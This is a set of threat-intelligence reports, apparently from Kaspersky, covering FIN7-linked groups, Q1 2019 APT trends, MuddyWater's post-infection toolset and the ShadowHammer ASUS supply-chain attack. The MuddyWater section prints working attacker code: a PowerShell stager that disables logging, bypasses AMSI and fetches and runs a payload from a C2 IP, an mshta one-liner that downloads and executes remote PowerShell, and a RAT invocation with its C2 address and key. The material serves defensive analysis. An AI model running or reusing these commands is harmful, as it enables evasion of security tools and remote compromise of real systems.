  • Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digitcert and Microsoft websites and used decoy job employment and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too, FIN7 on its GRIFFON C2s before January 2018, and Cobalt, on its staging servers, similar to CopyPaste.
  • Quite recently, FIN7 threat actors typosquatted the brand “Digicert” using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with their domains digicertweb[.]com and digi-cert[.]org, both used as a Powershell Empire C2 with decoy HTTP 302 redirects to the legitimate Digicert website.

The links between CopyPaste and FIN7 are still very weak. It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.

Conclusions

During 2018, Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader will have an impact on the group’s operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various level of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.

We link the AveMaria botnet to these two groups with medium confidence: AveMaria’s targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The last piece is the newly discovered CopyPaste group, who targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.

All of the aforementioned groups greatly benefit from unpatched systems in corporate environments. They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.

FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company “Combi Security”, we are confident that they continue to create new personas for use in either targeting or recruiting under a “new” brand, “IPC”.

More information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Indicators of compromise AveMaria
  • 185.61.138.249
  • tain.warzonedns[.]com
  • noreply377.ddns[.]net
  • 185.162.131.97
  • 91.192.100.62
  • server.mtcc[.]me
  • doddyfire.dyndns[.]org
  • 212.8.240.116
  • 168.167.45.162
  • toekie.ddns[.]net
  • warmaha.warzonedns[.]com
CopyPaste
  • digi-cert[.]org
  • somtelnetworks[.]com
  • geotrusts[.]com
  • secureclientupdate[.]com
  • digicertweb[.]com
  • sport-pesa[.]org
  • itaxkenya[.]com
  • businessdailyafrica[.]net
  • infotrak-research[.]com
  • nairobiwired[.]com
  • k-24tv[.]com
FIN7/GRIFFON
  • hpservice-cdn[.]com
  • realtek-cdn[.]com
  • logitech-cdn[.]com
  • pci-cdn[.]com
  • appleservice-cdn[.]com
  • servicebing-cdn[.]com
  • cisco-cdn[.]com
  • facebook77-cdn[.]com
  • yahooservices-cdn[.]com
  • globaltech-cdn[.]com
  • infosys-cdn[.]com
  • google-services-s5[.]com
  • instagram-cdn[.]com
  • mse-cdn[.]com
  • akamaiservice-cdn[.]com
  • booking-cdn[.]com
  • live-cdn2[.]com
  • cloudflare-cdn-r5[.]com
  • cdnj-cloudflare[.]com
  • bing-cdn[.]com
  • servicebing-cdn[.]com
  • cdn-yahooapi[.]com
  • cdn-googleapi[.]com
  • googl-analytic[.]com
  • mse-cdn[.]com
  • tw32-cdn[.]com
  • gmail-cdn3[.]com
  • digicert-cdn[.]com
  • vmware-cdn[.]com
  • exchange-cdn[.]com
  • cdn-skype[.]com
  • windowsupdatemicrosoft[.]com
  • msdn-cdn[.]com
  • testing-cdn[.]com
  • msdn-update[.]com
EmpireMonkey/CobaltGoblin

In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names.

  • (entity)-corporate[.]com
  • (entity)-cert[.]com
  • (entity)-no[.]org
  • (entity)-fr[.]org
  • (entity)-acquisition[.]org
  • (entity)-trust[.]org
  • riscomponents[.]pw
  • nlscdn[.]com

APT trends report Q1 2019

30 Duben, 2019 - 12:00

For just under two years, the Global Research and Analysis Team (GReAT) at Kaspersky Lab has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

The most remarkable finding

Targeting supply-chains has proved very successful for attackers in recent years – ShadowPad, CCleaner and ExPetr are good examples. In our threat predictions for 2019, we flagged this as a likely continuing attack vector; and we didn’t have to wait very long to see this prediction come true. In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, the mechanism used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers behind “Operation ShadowHammer” added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers were found to have hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist that target different MAC addresses.

Russian-speaking activity

Russian-speaking groups were not especially active during the first part of the year, with no noteworthy technical or operational changes. However, they continued their non-stop activity in terms of spreading, with a special interest in political activity.

This was apparent in an attack focused on the Ukraine elections. The attack surfaced after we discovered a malicious Word document targeting a German political advisory organization. This organization, according to its website, “advises political decision-makers on international politics and foreign and security policy”. Our technical analysis of the attack suggests that the Sofacy or Hades groups are behind it, though we’re unable to say for sure which of these groups is responsible.

Such political interests are not new. Recently, a court in Virginia gave Microsoft control of a group of websites that were intended to look like login sites for a Washington think tank, but are believed to be part of the infrastructure of a “Russian group suspected in the DNC hack”.

Additionally, Microsoft revealed that a “Russian nation-state hacking group” targeted political organizations engaged in the 2019 European Parliament elections scheduled for the end of May.

On the technical side, since mid-January we have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan. This time the actor delivered its known KopiLuwak JavaScript using new .NET malware, called “Topinambour” (aka Sunchoke) by its developers. The Topinambour dropper is delivered along with legitimate software and consists of a tiny .NET shell that waits for Windows shell commands from operators. Interestingly, in this campaign the attackers used different artefacts implemented in JavaScript, .NET and PowerShell – all of them with similar functionality.

We also published details on how Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled, open source language. Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East.

Finally, during February 2019 we observed a highly targeted attack in Crimea using a previously unknown malware. The spy program was spread by email and masqueraded as the VPN-client of a well-known Russian security company that, among other things, provides solutions to protect networks. At this point we can’t relate this activity to any known actor.

Chinese-speaking activity

Recent APT trend summaries included analyses of new Chinese-speaking threat actors as well as the resurgence of old activity sets. This has continued into 2019.

In the early months of 2019, Chinese-speaking actors were the most active, with a traditional interest in targeting different countries in South East Asia. A recent indictment of two Chinese nationals by the US Department of Justice on charges of computer hacking, conspiracy to commit wire fraud and aggravated identity theft, alleged that they were members of the APT10 group, carrying out illegal activity on behalf of the Chinese Ministry of State Security.

Similarly, CactusPete (aka LoneRanger, Karma Panda, and Tonto Team), is reported to have targeted South Korean, Japanese, US, and Taiwanese organizations in the 2012 – 2014 timeframe. The actor has quite likely relied on much the same codebase and implant variants for the past six years. However these have broadened substantially since 2018. The group spear-phishes its targets, deploys Word and Equation Editor exploits and an appropriated/repackaged DarkHotel VBScript zero-day, delivers modified and compiled unique Mimikatz variants, GSEC and WCE credential stealers, a keylogger, various Escalation of Privilege exploits, various older utilities and an updated set of backdoors, and what appear to be new variants of custom downloader and backdoor modules.

We have been monitoring a campaign targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We attribute the campaign, which we call “SpoiledLegacy”, to the LuckyMouse APT group (aka EmissaryPanda and APT27). The operators use penetration testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network services vulnerabilities as their main initial infection vector, we have also seen spear-phishing messages containing decoy documents. We believe that, as in a previous LuckyMouse campaign internal database servers are among the targets. For the last stage of their attack they use different in-memory 32- and 64-bit Trojans injected into system process memory. It is worth highlighting that all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code.

FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope, Leviathan and TEMP.Jumper. According to FireEye, the group has conducted operations in support of China’s naval modernisation effort since at least 2013, specifically targeting engineering, transportation and defence industries, especially where these sectors overlap with maritime technologies. Recently, FireEye also observed specific targeting of countries strategically important to the “Belt and Road” Initiative, including Cambodia, Belgium, Germany, Hong Kong, the Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States and the United Kingdom.

Interestingly, the use of newer ANEL versions by APT10, targeting Japan, allowed us to find similarities between this malware and Emdivi, malware previously used by BlueTermite. This suggests a potential connection between both actors.

South East Asia and Korean peninsula

Once again, this seems to be the most active region of the world in terms of APT activity.

In January, we identified new activity by the Transparent Tribe APT group (aka PROJECTM and MYTHIC LEOPARD), a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets.

In February, we identified a campaign targeting military organizations, this time in India. We are currently unable to attribute this campaign to any known threat actor. The attackers rely on watering-holes and spear-phishing to infect their victims. Specifically, they were able to compromise a website belonging to a think tank related to warfare studies, using it to host a malicious document that distributed a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same time period.

OceanLotus was another actor active during this period, using a new downloader called KerrDown, as reported by Palo Alto. The actor was discovered at the beginning of the year using freshly-compiled samples in a new wave of attacks. ESET recently uncovered a new addition to this actor’s toolset targeting Mac OS.

In mid-2018, our report on “Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges. In this operation, the group used a fake company with a backdoored product aimed at cryptocurrency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities has enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus isn’t the only APT group targeting cryptocurrency exchanges. The Kimsuky group has also extended its activities to include individuals and companies in this sector, mainly in South Korea.

Finally, at the start of the year, the South Asian Bitter group used a new simple downloader (called ArtraDownloader by Palo Alto) that delivers the BitterRat Trojan to target organizations in Saudi Arabia and Pakistan.

Middle East

Surprisingly, during the first months of the year activity in the Middle East has, apparently, been less intense than in the past. Even so, it was the target of several groups already discussed, such as Chafer and Bitter.

We also observed some activity from Gaza Team and MuddyWater. Still, this can be considered part of their continued targeting of the region, showing nothing new in terms of operational or technical improvements.

Other interesting discoveries

Late in 2018 we observed a new version of the FinSpy iOS implant in the wild. This is part of FinSpy Mobile, a product provided by the surveillance solutions developer, Gamma Group. FinSpy for iOS implements extensive spyware features that allow someone to track almost everything on infected devices, including keypresses, messages and calls. A big limitation is that the current version can only be installed on jailbroken devices. We believe that Gamma Group does not provide an exploit tool to jailbreak victims’ phones, but it provides advice and support to customers on how to do the jailbreaking themselves. Our telemetry shows implant traces in Indonesia and Mongolia. However, due to the large number of Gamma customers, this is probably only a fraction of the victims.

Following this research, we discovered a new version for Android also dated circa June 2018. While it is quite similar in terms of functionality, it implements unique capabilities specific to the platform such as obtaining root privileges by abusing the DirtyCow exploit (CVE-2016-5195). Just like the iOS version, this implant has features to exfiltrate data from Instant Messengers including Threema, Signal, Whatsapp and Telegram, as well as internal device information including, but not limited to, emails and SMS messages.

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have recently discovered using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on 22 February. The company confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on 12 March 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. We believe that this exploit is being used by several threat actors – including, but possibly not limited to, FruityArmor and SandCat. FruityArmor is known to have used zero-days before, while SandCat is a new APT actor that we discovered only recently. The exploit found in the wild was targeting 64-bit operating systems in the Windows 8 to Windows 10 build 15063 range.

FrutiyArmor and SandCat, interestingly, seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both with such artefacts.

Ransomware has become an interesting tool for APT actors, as it can be used to delete traces, conduct cyber-sabotage, or as a powerful distraction. There is an interesting wave of ransomware attacks that we have been following, as they seem to be mainly interested in big targets. LockerGoga recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins. However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords and removing their ability to log back into the system. In such cases, the victims may not even get to see the ransom note.

Final thoughts

Looking back at what has happened during the first months of the year is always a surprising experience for us. Even when we have the feeling that “nothing groundbreaking” has occurred, we always uncover a threat landscape that is full of many interesting stories and evolution on different fronts.

If we are to provide a few general highlights, we can conclude that:

  • Geopolitics keeps gaining weight as the main driver of APT activity
  • South East Asia is still the most active region of the world in terms of APT activity, but probably this is also related to the “noise” that some of the less experienced groups make
  • Russian-speaking groups keep a low profile in comparison with recent years: maybe this is part of internal restructuring, but this is just a hypothesis
  • Chinese-speaking actors maintain a high level of activity, combining low and high sophistication depending on the campaign
  • Providers of “commercial” malware available for governments and other entities seem to be doing well, with more customers

If we are to highlight one thing from the whole period, in our opinion operation ShadowHammer combines several factors that define the current status of APT activity. This is an advanced and targeted campaign using the supply-chain for distribution on an incredibly wide scale. It involves several steps in a combined operation, including the initial collection of MAC addresses for their targets. This seems to be a new trend, as the actor also targeted other victims for malware distribution, showing how worrisome and difficult it is to fight supply-chain attacks.

As always, this is only our visibility. We always have to keep in mind other sophisticated attacks that happen under our radar, but we continue to try and improve, to uncover every single one of them.

I know what you did last summer, MuddyWater blending in the crowd

29 Duben, 2019 - 10:00

Introduction

MuddyWater is an APT with a focus on governmental and telco targets in the Middle East (Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon) and also a few other countries in nearby regions (Azerbaijan, Pakistan and Afghanistan).

MuddyWater first surfaced in 2017 and has been active continuously, targeting a large number of organizations. First stage infections and graphical decoys have been described by multiple sources, including in our previous research: “MuddyWater expands operations

Nevertheless, comprehensive details of what happens after the initial infection by MuddyWater have not previously been made publicly available. MuddyWater attackers deploy a variety of tools and techniques, mostly developed by the group itself in Python, C# and PowerShell, to implement their attacks and complete their victim infiltration and data exfiltration. Examples of such tools include multiple download/execute tools and RATs in C# and Python, SSH Python script, multiple Python tools for extraction of credentials, history and more.

This report details a collection of tools used by this threat actor on its targets after initial infection. It also details deceptive techniques used to divert investigations once attack tools have been deployed inside victim systems (such as Chinese strings, Russian strings and impersonation of the “RXR Saudi Arabia” hacking group). The investigation revealed additional OPSEC mistakes by the attackers, but we are not detailing those here due to ongoing law enforcement investigations.

Attackers’ toolset analysis

During our research on MuddyWater campaigns, we were able to identify a number of tools and scripts used by this actor, providing a good understanding of this actor’s abilities. Most of the tools used are custom developed, while others are based on more generic and publicly available ones.

The list includes:

  • Nihay – C# Download-and-Execute tool
  • LisfonService – C# RAT
  • Client.py – Python RAT
  • Client-win.py – SSH Python script
  • Rc.py/Rc.exe – Basic Python RAT
  • VBScript and VBA files
  • Third-party scripts (Muddy, Losi Boomber, Slaver reverse tunnel…)
  • Second stage PowerShell scripts

Most of these tools are scripts written in Python or PowerShell. We noticed that MuddyWater compiles various offensive Python scripts into executables for portability, using Py2Exe and PyInstaller for this task. This includes Python scripts such as “CrackMapExec”, “shootback” and “Lazagne”.

We have also noticed the use of “PS2EXE” to convert PowerShell scripts into executables, with the original PowerShell code embedded as a Base64-encoded string. In other cases, we have noticed a preference for using PowerShell Reflective DLL injection to deploy Metasploit Stageless Meterpreters. They use both 32-Bit and 64-Bit versions. Usually, the Stageless Meterpreter has the “Ext_server_stdapi.x64.dll”, “Ext_server_extapi.x64.dll”, and “Ext_server_espia.x64.dll” extensions.

Nihay – C# Download-and-Execute tool

The tool called “Nihay” (as per its Pdb) is a basic “Download-and-Execute” Trojan written in C#. It downloads a PowerShell one-liner from a hardcoded URL (for instance, https://beepaste[.]io/view/raw/pPCMo1) and passes it to “cmd.exe /c”.

LisfonService – C# RAT

LisfonService is a RAT very similar to the PowerShell RAT that we have analyzed in our previous publication. LisfonService randomly chooses a URL from a huge array of hardcoded Proxy URLs hiding the real C2 server. It collects some basic information about its victim: user name, domain or workgroup name, machine name, machine internal IP address, OS version, OS build and public IP address. Once the victim is successfully registered, a victim id is assigned to the victim and is used later to request commands from the C2, such as executing PowerShell code or causing a Blue Screen.

Inside the decompiled C# code, there is a referenced variable named “str1” that is not actually used. We believe that it is a remnant from an earlier testing phase and it might be the IP address of the C2 behind the Proxy URLs.

str1 = "http://78.129.222.56:8090/244271232658346635408608084822345041494";

When reaching this URL it returns a funny chat that attackers may have left for researchers:

Client.py – Python RAT

Client.Py is a Python 3.6 RAT that we believe was developed by MuddyWater. It is deployed on victim computers as a compiled Python executable using PyInstaller. The execution flow is as follows:

  1. Collects basic information about the victim machine: machine name, OS name, OS version, and user name. It then sends the information to the C2 server at 192.64.86[.]174:8980.
  2. It supports multiple commands, some of them executed by creating a temporary .VBS file and running it by calling cscript.exe. The supported commands allow the RAT to implements basic keylogger functionality, stealing passwords saved in Chrome, killing task manager, remote command execution and displaying an alert message for the victim in a message box.
Client-win.py – SSH Python script

This PyInstaller-compiled Python script makes use of the Python paramiko plugin to create a SSH connection to its C2.

  1. Connects to a hard-coded IP address for the C2 (for instance 104.237.233[.]38) on port 8085, sending the string “ip”. It should then receive a list of IPs in the form of “ip1::ip2::ip3”.
  2. The script then connects to the same hard-coded IP address ,sending the string “pw” so that it gets a list of passwords from the C2 in the form of “pw1\npw2\npw3”.
  3. Finally, it tries a list of hard-coded user names (such as ‘cisco’, ‘root’, ‘admin’) with each of the passwords received on each of the IPs obtained in step 1 to authenticate SSH sessions.
Rc.py/Rc.exe – Basic Python RAT

This UPX-packed executable is a PyInstaller-compiled Python script (rc.py). The script receives the IP address of its C2 as parameters, connecting to it on the hard-coded port 9095.

This basic RAT supports a few commands on victims’ systems to collect passwords and remote command execution.

  • “kill” to self-terminate.
  • “cd” for changing current directory.
  • “dopass” for grabbing credentials from Chrome, IE, Mozilla, Opera and Outlook.
  • “info” extracts basic info about victim machine: OS name/version, 32-bit/64-bit, processor name, user name, machine name, machine FQDN, internal IP address, MAC address, and public IP address.
  • “shell” receives files from C2 and saves them in “C:\ProgramData”‘
  • “exec” spawns a new process as determined by C2.
  • Otherwise, cmd.exe /c is called to spawn a new process as determined by C2. Output is always sent to C2.
VBScript and VBA files

One of MuddyWater’s preferred infection vectors is the use of weaponized macro-enabled Office 97-2003 Word documents. Its malicious VBA code includes a Base64-encoded payload.

The first file is a malicious VBScript and the second file is the Base64-encoded payload. The VBS calls powershell.exe to Base64-decode the second file and invoke it, as follows:

WScript.CreateObject("WScript.Shell").Run "mshta vbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"""",0 ""))",0

This same technique has been seen implemented in several VBScripts seen in the wild, also suspected of being used by this actor.

Third-party scripts

We detected MuddyWater including several “Lazagne“-based scripts in its arsenal. The first one, called Losi Boomber, is used to extract credentials and history from browsers and Outlook.

Losi Boomber command line arguments

Muddy is another Lazagne-based script extracting credentials from mail clients and browsers.

Muddy command line arguments

In this case, it supports the following browsers: Chrome, IE, Mozilla, Opera and Coccoc. In terms of mail clients, it only supports Outlook.

Some embedded imported Python modules

Slaver.py is a compiled Python script taken from “ShootBack”, used for establishing a reverse tcp tunnel.

Slaver command line arguments

Cr.exe is a compiled Python script based on CrackMapExec, used for credential gathering and lateral code execution. Mmap.py (called “MapTools” by MuddyWaters) is also based on CrackMapExec and used for the same purpose.

Embedded Imported Python Modules

Second stage PowerShell scripts

We detected MuddyWater making extensive use of PowerShell scripts for different purposes:

Case1: To fetch next stage, which is also a PowerShell script:

If($PSVerSIonTAblE.PSVeRSIon.MAJoR -Ge 3){ $GPS=[ReF].AsSemBLy.GEtTYpE('System.Management.Automation.Utils')."GetFiE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static').GeTVAluE($NulL); If($GPS['ScriptB'+'lockLogging']){ $GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0; $GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0 }ELsE{ [SCriPTBlOCk]."GetFIe`Ld"('signatures','N'+'onPublic,Static').SETVAlue($NUlL,(NeW-OBJECt ColLECTIOnS.GENERIC.HaShSEt[STrInG])) } [REf].ASsembly.GetTYPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFielD('amsiInitFailed','NonPublic,Static').SeTVALUE($NUll,$tRuE)};}; [SyStEM.NEt.SerVICEPoINtMaNAGeR]::EXPEct100CONTiNuE=0;$K=[SySteM.TExt.EncoDINg]::ASCII.GetBYtES('mdxg_U(,Q3[;~a20DFhrvO+H-NAnKz!V'); $R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256; $H=($H+$S[$I])%256; $S[$I],$S[$H]=$S[$H],$S[$I]; $_-BXOR$S[($S[$I]+$S[$H])%256]}}; $ie=New-Object -COM InternetExplorer.Application; $ie.Silent=$True; $ie.visible=$False; $fl=14; $ser='http://104.237.233.40:7070'; $t='/admin/get.php'; $ie.navigate2($ser+$t,$fl,0,$Null,'CF-RAY: oBLKRK3GNKZcBGZeWl+s4ExIaQ0='); while($ie.busy){ Start-Sleep -Milliseconds 100}; $ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml; try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null} $iv=$DATA[0..3]; $data=$dATa[4..$DATa.LENGTh]; -joiN[ChaR[]](& $R $DATa ($IV+$K))|IEX

Besides disabling PowerShell Script Block Logging and bypassing AMSI (Anti-Malware Scan Interface), it fetches its next stage using the “InternetExplorer.Application” COM object to retrieve HTML content from http://104.237.233[.]40:7070/admin/get.php. Interestingly it uses a hard-coded CloudFlare HTTP header value: “CF-RAY: oBLKRK3GNKZcBGZeWl+s4ExIaQ0=”

Case 2: We also identified MuddyWater’s PowerShell prototype RAT implementing functions to collect user info (internal IP address, user name, domain name, 32bit/64bit), RC4 encryption/decryption, Base64 encoding and decoding, changing cached group policy settings (cachedGroupPolicySettings) for PowerShell security settings, EnableScriptBlockLogging, EnableScriptBlockInvocationLogging. It also disables all HTTPS SSL certificate checks.

We have seen cases where the above was renamed to “km” and directly invoked with its C2 IP set to “78.129.139[.]134 “port “8080” and RC4 key set to “KharashoNIKharasho!@#123456_6”:

km -ip 78.129.139.134 -port 8080 -Key KharashoNIKharasho!@#123456_6 -Delay 20

Case 3: We found an interesting case (apparently exclusive to this actor) of a WinRAR SFX (self-extracting archive) named “Iranicard.exe”. The embedded SFX pre-setup script is an MSHTA one-liner, which invokes a PowerShell one-liner that downloads and executes PowerShell code from ‘https://dzoz[.]us/js/js.js’.

Presetup=mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").run ""powershell.exe -nop -w hidden -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $V.downloadstring('https://dzoz.us/js/js.js');"",0")) Attribution, distraction and OPSEC

In our analysis of this actor’s activities we have detected multiple OPSEC mistakes and analyzed some of the distraction techniques it has used. Among the OPSEC mistakes, there were multiple PDB file paths left in some samples or in artifacts collected from the C2 server.

Dragon and Panda strings

The .Net RAT called “LisfonService” has PDB file paths referring to “dragon” and “Panda” as user names.

C:\Users\dragon\Documents\Visual Studio 2015\Projects\64\Telegram\LisfonService\obj\Release\LisfonService.pdb

Dragon in LisfonService PDB File Path

C:\Users\Panda\Documents\Visual Studio 2010\Projects\TestService\TestService\obj\x86\Release\TestService.pdb

Panda in TestService (LisfonService Earlier Version) PDB File Path

Panda and dragon could have been deliberately used to point researchers to a possible Chinese actor, or it may just be the way attackers like to refer to themselves. It is worth mentioning that in some of the PowerShell RATs, attackers also used the “$dragon_middle” variable name for an array of C2 proxy URLs.

$dragon_middle from the Powershell samples

User names inside weaponized word documents

Multiple weaponized Office Word documents also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances: for instance, when somebody adds a binary object (like an OLE control such as a text box or a command button) into a Word document. These PDBs provide the following usernames: poopak, leo, Turk and Vendetta:

C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd Chinese language strings

Multiple Chinese strings can be found in some PowerShell RAT payloads (such as Ffb8ea0347a3af3dd2ab1b4e5a1be18a) that seem to have been left in on purpose, probably to make attribution harder.

if (IQQXIJFBIIVIOKFCSXFHBBQFFDMWTL -p "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -k "MalwareDefenderSDK" -v "wscript $tempPath$filenamePathV" -eq "error"){ Write-Host "无法访问本地计算机寄存器" } try{ schtasks /Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareDefenderSDK /TR "wscript $tempPath$filenamePathV" /F } catch{ Write-Host "任务计划程序访问被拒绝" } } [System.Net.WebResponse] $resp = $webreq.GetResponse(); if ($resp -ne $null){ $data = $resp.GetResponseStream(); [System.IO.StreamReader] $res_data = New-Object System.IO.StreamReader $data; [String] $result = $res_data.ReadToEnd(); } } catch { Write-Host '无法连接到网址,请等待龙...' $result = "error" } Russian strings and impersonation of “RXR Saudi Arabia” hacking group

In another PowerShell sample (md5: e684aa1c6e51f4696a836ecb6ff1e143, filename: km.ps1), attackers used Russian words as the RC4 key when establishing a connection to the C2 server (78.129.139[.]134).

km -ip 78.129.139.134 -port 8080 -Key KharashoNIKharasho!@#123456_6 -Delay 20

Moreover, IP 78.129.139[.]134 is used as a C2 for other samples as well. Interestingly, when visiting the C2, it displays a blank webpage whose HTML source code shows a strange HTML tag value that suggests attackers have tried to impersonate a Saudi Hacking group called RXR Saudi Arabia.

Conclusion

MuddyWater attacks have been expanding in recent years in terms of targets and malware functionality. The attackers seem to be reasonably well-equipped for their goals, with relatively simple and expendable tools to infiltrate victims and exfiltrate data, mostly using Python and PowerShell-based tools. These tools also seem to allow them flexibility to adapt and customize the toolset for victims.

This continuous capability to steadily adjust and enhance attacks, adapting well to the changing Middle Eastern geopolitical scene, seems to make this actor a solid adversary that keeps growing. We expect it to keep developing or acquiring additional tools and abilities, possibly including zero-days. Nevertheless, its current OPSEC should be considered poor – for example, leaving details which could reveal different types of information about them.

For more information about the attacks and the indicators of compromise, please contact: intelreports@kaspersky.com

Operation ShadowHammer: a high-profile supply chain attack

23 Duben, 2019 - 12:00

In late March 2019, we briefly highlighted our research on ShadowHammer attacks, a sophisticated supply chain attack involving ASUS Live Update Utility, which was featured in a Kim Zetter article on Motherboard. The topic was also one of the research announcements made at the SAS conference, which took place in Singapore on April 9-10, 2019. Now it is time to share more details about the research with our readers.

At the end of January 2019, Kaspersky Lab researchers discovered what appeared to be a new attack on a large manufacturer in Asia. Our researchers named it “Operation ShadowHammer”.

Some of the executable files, which were downloaded from the official domain of a reputable and trusted large manufacturer, contained apparent malware features. Careful analysis confirmed that the binary had been tampered with by malicious attackers.

It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature.

We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”).

The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses into the trojanized samples and the list was used to identify the intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from more than 200 samples used in the attack. There might be other samples out there with different MAC addresses on their lists, though.

Technical details

The research started upon the discovery of a trojanized ASUS Live Updater file (setup.exe), which contained a digital signature of ASUSTeK Computer Inc. and had been backdoored using one of the two techniques explained below.

In earlier variants of ASUS Live Updater (i.e. MD5:0f49621b06f2cdaac8850c6e9581a594), the attackers replaced the WinMain function in the binary with their own. This function copies a backdoor executable from the resource section using a hardcoded size and offset to the resource. Once copied to the heap memory, another hardcoded offset, specific to the executable, is used to start the backdoor. The offset points to a position-independent shellcode-style function that unwraps and runs the malicious code further.

Some of the older samples revealed the project path via a PDB file reference: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb“. This suggests that the attackers had exclusively prepared the malicious payload for their target. A similar tactic of precise targeting has become a persistent property of these attackers.

